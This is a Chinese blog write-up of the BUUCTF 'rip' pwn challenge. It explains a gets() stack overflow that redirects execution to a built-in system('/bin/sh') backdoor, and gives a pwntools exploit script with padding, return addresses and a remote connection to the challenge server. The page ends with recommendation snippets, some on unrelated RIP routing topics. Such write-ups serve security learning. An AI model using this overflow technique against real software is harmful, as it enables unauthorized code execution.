rip 1

最新推荐文章于 2024-05-30 22:53:14 发布
最新推荐文章于 2024-05-30 22:53:14 发布
阅读量233 收藏
点赞数
分类专栏: BU pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_52034946/article/details/112546210
版权

打开虚拟机,checksec,查看文件基本信息
在这里插入图片描述
64位,小端序
拖入相应ida,查看伪代码.

在fun函数里看到了这个(通过字符串也可以转到这里)
在这里插入图片描述

system("/bin/sh")这个函数可以帮助我们获取shell权限,他的地址
在这里插入图片描述
main函数里有一个gets函数,这个函数是不会限制输入的字符长度的,一般来说,这就是一个栈溢出的题目

编写一个exp的基本框架:

from pwn import *

DEBUG # 自己设定值 在本地调试还是远程利用 当然这只是一种相对规范的写法,不写也无所谓

if DEBUG:

r = process(bin路径)  # 在本地调试

else:

r = remote(ip, port)  # 连接其他主机的服务 需要输入对应的ip地址和端口号

… # 输入payload来进行操作以拿到程序的shell

r.interactive() # 反弹shell

操作步骤

打开虚拟机,最好创建一个专门的文件夹用来存放附件.

touch 文件名.py
写好后,python 文件名 运行

exp我也不太会写,纯复制=-=

64位,ebp是8,32位是ebp是4

写exp
from pwn import*
r=remote(‘node3.buuoj.cn’,26405)
shell_addr=0x401186
payload=‘a’*(0xF+8)+p64(0x401198)+p64(shell_addr)
#payload=‘a’*15+p64(shell_addr)
r.sendline(payload)
r.interactive()

theThreeDay
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
BUUCTF PWN-RIP详解
weixin_43780092的博客
09-07 4902
BUU CTF PWN 入门知识详解
BUU刷题-Pwn-rip
一个啥也不会的小菜鸡!
07-13 262
因为此题出的比较草率,没有考虑关闭缓冲区,please input加入缓冲区之后并没有满,因此继续留在缓冲区即程序并没有输出出来,所以根本就收不到这字符串,自然就会超时。有后门函数,利用栈溢出(思路没问题,但是远程的环境有问题)里面有详细解释,涉及到[[堆栈平衡]]
RIP两个版本:RIP-1和RIP-2
最新发布
网络技术联盟站
05-30 1101
RIP-1的优点配置简单,实现成本低,适合小型网络环境。已经被广泛应用和验证,具有较高的稳定性。计算简单,对路由器资源消耗较低。RIP-1的缺点收敛速度慢,容易出现路由环路和震荡问题。最大跳数限制为15,在大型网络中可达性有限。不支持VLSM,地址空间利用率较低。没有认证机制,安全性较差。只支持IPv4单播地址,不适用于异构网络。RIP-2的优点相比RIP-1有很大改进,功能更加完善。支持VLSM,提高了地址空间利用率。使用多播方式更新,减少了不必要的流量。
RIP1实验1(实现不同路由器 不同PC机之间的通信)
Joker的博客
02-01 3901
RIP1路由实验 本文以华为模拟器ensp为基础进行操作 一、实验拓扑图: ensp上构建的实验拓扑图: 二、实验准备 分析: 由上述的实验拓扑图可知,该拓扑图中共存在8个网络,那么所需要的网络地址一共需要8个,路由器C的e1接口所在的网络连接的主机数最多,共需要7个ip地址(e1接口1个ip地址,交换机1个ip地址,3个pc机需要3个ip地址,1个网络地址,1个广播地址),那么主机位数最小要...
BUU-rip
qq_45771413的博客
04-27 661
查看保护 IDA分析 看到gets函数,这里没有输入长度限制,输入的s为16位 接下来找有没有敏感权限: shift+f12 找到了 /bin/sh,打开发现其地址在401186 Tips:这里包含了system指令,若不包含还得找到system地址,payload(填充字符串+填充rbp地址+system地址+/bin/sh地址) 尝试写exp 运行后报错:Got EOF while reading in interactive from pwn import * p = remote('node3
动态路由RIP协议
热门推荐
weixin_64051859的博客
12-21 2万+
用到是依旧是华为的ensp 第一步:先对192.168.1.0/24进行子网划分 由题可知会用到6个网段,划分后用的网段如下所示 192.168.1.0/27 192.168.1.32/27 192.168.1.64/27 192.168.1.96/27 192.168.1.128/27 192.168.1.160/27 精确后如下图 第二步:设置环回以及接口IP [r2]interface LoopBack 0 [r2-LoopBack0]ip ad...
rip v1.pkt
12-06
rip v1.pkt
rip v1与ripv2路由协议更新机制
10-01
本文将详细介绍rip v1与ripv2路由协议更新机制原理,需要了解的朋友可以参考下
rip1实验报告1
08-08
1、路由器网络地址方案设计路由器序号E0E1E2A188.1.1.1/16188.2.1.1/16B188.3.1.1/16188.2.1.2/16C188.3
Necrostatin-1 保护谷氨酸诱导的细胞死亡机制不同于对RIP1/RIP3介导的细胞坏死途径的调控
02-02
Necrostatin-1 保护谷氨酸诱导的细胞死亡机制不同于对RIP1/RIP3介导的细胞坏死途径的调控,徐雷,何苏丹,目的 研究 necrostatin-1与受体相互作用蛋白激酶1(RIP1)及受体相互作用蛋白激3(RIP3)在谷氨酸诱导的小鼠...
19335074-黄玟瑜-RIP1
08-04
实验报告的主题是关于RIP(Routing Information Protocol)路由协议的实践操作,特别是RIPv1和RIPv2的区别。实验的目标包括理解RIP的工作原理,掌握如何在路由器上配置RIPv2,以及学会使用调试命令Debug ip packet和...
栈溢出的基础原理,EBP/EIP/ESP详解 --- buuctf rip 1题目讲解
yajuanpi4899的博客
11-28 5643
栈帧概念:一个基本函数所需要的栈空间,当调用子函数时需要调用新的栈帧 涉及到栈有三个寄存器(32):esp,eip,ebp-->对应64位的rsp,rip,rbp esp:指向当前栈帧的顶部。 ebp:指向当前栈帧的底部。 eip:指向当前栈帧中执行的指令。 栈溢出漏洞的基本方向是:父函数(caller)在调用子函数(callee)结束时,会取子函数的return address,这个地址中保存着父函数的基地址。即:在一个函数调用完以后,就要删除此时的栈帧并将Return Address
RIP1与RIP2的区别,以及防环机机制
xtggbmdk的博客
03-27 2349
RIP简介: RIP(Routing information Protocol)是用的较普遍的内部网关协议(Interior Gateway Protocol,简称IGP),适用于小型同类网络,是典型的距离向量(distance-vector)协议。 RIP 通过广播UDP报文来交换路由信息,每30秒发送一次路由信息更新。RIP提供跳跃计数(hop count)作为尺度来衡量路由距离,...
路由器RIP-1配置
菜鸟的博客
04-09 6338
路由器RIP-1配置1.  学习目的1.        掌握动态路由的配置方法2.        理解RIP协议的工作过程2.  实验过程1.1        实验设备1.        RG-RSR20-X  3台2.        PC机       1台3.        Hub        1台1.2        实验拓扑1.3        实验步骤1.        在config...
BUUCTF_2.RIP覆盖一下
Jc
07-05 3760
解题思路 1. 查看文件信息,安全机制 2. 代码审计 3. 分析漏洞点 4. 编写EXP 1.基本信息 $checksec ./文件名 2.代码审计 不管在简单题都一定要IDA查看一下伪代码(IDA做好是7.0以上的版本) 首先查看敏感字符串(Ctrl+1) 1.gets从标准输入设备读字符串函数,其可以无限读取,不会判断上限,以回车结束读取,所以应该确保buffer的空间足够大,以便在执...
BUUCTF:test_your_nc
Starbright.的博客
01-13 1590
1.直接nc连上去查看目录ls后cat flag(cat用于连接文件并打印到标准输出设备上)
BUU RIP网上WP的个人理解
weixin_46287316的博客
12-13 582
BUU RIP 具体的WP可以参照其他博主的WP。 这里我仅分享我对这两个payload可以成功的一些理解。 payload = b'a' * 23 + p64(0x401186 + 1) payload = b'a' * 23 + p64(0x401198) + p64(0x401186) 相关知识点: 栈对齐:栈指针要能被16字节整除,(但是我用的64位Ubuntu20,是8字节) 而至于为什么这两个payload能用,感觉和我所理解栈对齐没什么关系。原因应该是system函数中有一条指令需要
初学pwn-BUUCTF(rip)
天柱的博客
08-30 2455
初学pwn-writeUp BUUCTF平台的一道题目,rip。 与之前同样的步骤,启动靶机,链接远端 发现这里提示输入一些内容,但是输入完成之后,这里就结束了。还是要打开文件查看一下。 看到这里,只有一个输入的过程可以操作,那就很清楚了,就是要栈溢出了。点进去看一下。 可以看到这里s这个数组是15个字节,到r这个返回值还需要8个字节。不过这里要注意的一点是,这个15是十进制的,不能像之前再在数字之前加0x标记十六进制,这里可以直接写十进制。 摁shift+f12,可以看到这时还有什么地址可能会用到,
思科模拟器RIP1协议的配置
大方子
11-24 3815
思科模拟器RIP1协议的配置   网络拓扑图:   3台路由器,3台交换机,6台电脑 R0:10.0.0.1 和192.168.0.1 R1:20.0.0.1 和 192.168.0.2 和192.168.1.1 R2:30.0.0.1 和 192.168.1.2   PC0: IP地址 10.0.0.2 子网掩码255.0.0.0 网关 10.0.0.1 子网掩码255...
2、讨论Rip v1和Rip v2之间的本质区别。
05-23
1. 子网掩码:RIP v1只支持传递类ful网络地址,不能传递子网掩码,因此无法处理VLSM(可变长度子网掩码)。RIP v2可以传递子网掩码,可以处理VLSM。 2. 路由标签:RIP v1没有路由标签,导致无法支持路由策略。RIP ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值